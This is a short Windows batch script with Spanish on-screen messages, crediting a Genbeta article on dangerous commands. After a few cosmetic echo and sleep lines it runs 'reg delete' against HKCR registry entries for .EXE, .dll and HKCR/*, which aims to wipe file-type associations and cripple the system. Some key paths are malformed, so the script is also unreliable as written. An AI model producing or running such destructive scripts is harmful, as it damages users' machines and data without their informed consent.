:: Thanks: https://www.genbeta.com/herramientas/diez-comandos-texto-peligrosos-para-windows-linux-mac
@echo off 
TITLE Eliminando Registros...
echo Eliminando registros...
SLEEP 2
echo Empezando...
SLEEP 1
echo Si no tiene permisos de administrador no funcionara...
SLEEP 1
START reg delete HKC/.EXE
START reg delete HKCR.dll
START reg delete HKCR/*
